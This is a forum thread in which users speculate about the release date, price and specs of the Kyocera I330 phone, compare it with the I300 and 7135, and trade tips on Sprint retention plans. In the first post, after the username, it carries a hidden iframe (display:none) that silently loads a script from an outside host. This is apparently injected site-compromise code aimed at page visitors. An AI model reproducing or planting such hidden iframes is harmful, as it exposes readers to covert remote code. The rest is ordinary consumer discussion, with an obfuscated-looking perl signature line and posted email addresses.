+ Reply to Thread

Thread: I330

I330

Has there been any confirmation on the status of availability for the I330.

I also have not seen any accurate or detailed specs for it.

Any help would be appreciated.

Frydog<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Best Buy and Comp USA both have the 330 in their systems currently. The BB rep I spoke with stated it would be available October 27th.

I300 and I330 now missing from the Best Buy Site

I just check the Best Buy web site and now both the I300 and the I330 are missing from the list of available phones.

They were both there just the other day. I am getting frustrated with this slow rollout of PALM based 3G phones.

frydog

how is i330 better i300?

like all of you, i am patiently waiting for the I330 to come out so I can pick it up the first day. But it doesnt make much sense! Parting with $500 to get basically the same exact phone with 3G. Same crappy screen (possibly the worst color screen out now).
    Since reports of 3G isnt so much better than 2G, is it really worth it? We will be losing the secondary screen also. Sure might not be the coolest or most useful option, but Now I feel like we will be downgrading for $500.
    Maybe I should wait...but for what. The i330 is 5 months behind schedule, so that means that the i500/600/700/800 will be a LONG long time in the waiting. The toshiba isnt a true phone so whats the point. The treo is just too big and just not what a happy i300 user is looking for. The XDA looks to be everything we are looking for but not available on sprint.
    Anyone know of any phones on CDMA that are currently available in asia?

Re: how is i330 better i300?

Originally posted by Autostream
    like all of you, i am patiently waiting for the I330 to come out so I can pick it up the first day. But it doesnt make much sense! Parting with $500 to get basically the same exact phone with 3G. Same crappy screen (possibly the worst color screen out now).
    Since reports of 3G isnt so much better than 2G, is it really worth it? We will be losing the secondary screen also. Sure might not be the coolest or most useful option, but Now I feel like we will be downgrading for $500.
    Maybe I should wait...but for what. The i330 is 5 months behind schedule, so that means that the i500/600/700/800 will be a LONG long time in the waiting. The toshiba isnt a true phone so whats the point. The treo is just too big and just not what a happy i300 user is looking for. The XDA looks to be everything we are looking for but not available on sprint.
    Anyone know of any phones on CDMA that are currently available in asia?
    If I were you, I would look seriously at the Kyocera 7135. It *does* have a better screen, and *is* worth the upgrade.

I believe it will be out within a few weeks now.

Alan

For me the $500 is no big deal, what annoys me is that -- even with the new 3G plans -- my monthly rate will go way up from a solid retention plan and wireless web -- basically I pay $45 for unlimited voice and internet. No 3G is even close.

Originally posted by masonuc
    For me the $500 is no big deal, what annoys me is that -- even with the new 3G plans -- my monthly rate will go way up from a solid retention plan and wireless web -- basically I pay $45 for unlimited voice and internet. No 3G is even close.
    I added unlimited Vision to my retention plan for an extra $10/month (when you add Vison, you lose the $5/month WW so it ends up being only an extra $5/month over what you are paying now). Lots of reps in the retention department don't know how to add Vision or are convinced it can't be done but it can. If you get one of those reps, call back until you find one who will add the unlimited Vision to your retention plan.

Can I do it if I currently have a retention plan?

Question retention plan

I'm curious about these retention plans you talk about. I recently got an I300 and upgraded my plan to the $45/month for 500/2000 minutes with web. With my old phone, I was paying $25/month for 70/500 minutes. You may contact me through email if you like: mbest@com.org.

Originally posted by masonuc
    Can I do it if I currently have a retention plan?
    Of course. Like I said in my current post, I added Vision to my existing retention plan (1300 AT, 3000 NW, $50/month) for an extra $10/month. You do not have to switch plans.

NO I330 at BB today

Was at Best Buy in Orlando, FL this morning. No I330's to be found(not suprised)...the kid I talked to had no clue

....and we wait.

Re: Re: how is i330 better i300?

Originally posted by abward
    If I were you, I would look seriously at the Kyocera 7135. It *does* have a better screen, and *is* worth the upgrade.
    Alan
    heck no. Sure it has an awesome screen, impressive hardware, and mp3 playback is big bonus too, but no thanks. Screen is way to small, and its not a touch screen. All that wasted space on 'real' buttons which i dont need, would rather have the screen space to enjoy while surfing the web or watching videos, etc.

Administrator

Arrow

the 7135 is a touch screen. 65,000 colors is something nice to look at .

Re: NO I330 at BB today

Originally posted by kdavis
    Was at Best Buy in Orlando, FL this morning. No I330's to be found(not suprised)...the kid I talked to had no clue
    Yea, same deal here. The guy wearing the "sprint expert" shirt didn't even know the model numbers of the phones.. some expert.
    perl -e
    's++=END;++y(;-P)}\n?k++=;<+xr(r-du}?print:??;'

I was just in my local Sprint store, and the manager I spoke to said that the i330 will be out next month. I assume he means sometime in Novemeber.

Also, the i300 is going to be discontinued next month (no surprise there). So maybe at least we'll see some cheaper prices on accesories.

I300's are all gone

he I300's are all gone except for a few here and there in the Sprint stores

The screen on my I300 died Friday, took it back to CompUSA under 2 yr replacement warrany. They couldn't get an I300 and had no clue as to when the I330 would be available. They gave me a new Handspring Treo 300 which I promptly sold for $300 cash a few hours later.

Nope, no more I300's

PS..in case anyone needs a car charger or belt cases for an I300, I have some to sell...CHEAP !!

lizard@core.com

Re: Re: how is i330 better i300?

Just at my Sprint store (Livonia, Michigan) today. They said to expect the I-330 in Mid-november (but they didn't have the i-300 for WEEKS after it came out).

He also said the 7135 wasn't going to come out for Sprint.

I'm just the messenger. I'm not even saying it's accurate. I'm just saying it was said.

Gary

Originally posted by abward

I believe it will be out within a few weeks now.

Alan

Administrator

Arrow

sprint will carry the 7135.. that is not the issue. its when will they release it...

lots of stuff has been said over the last 6 months.. this is nothing new...

just back from a comp usa in new york city. i was told that the i330 was indeed in their computers and that the price was $499. in addition, he said the device would be available for purchase next week.

hoping this is true.......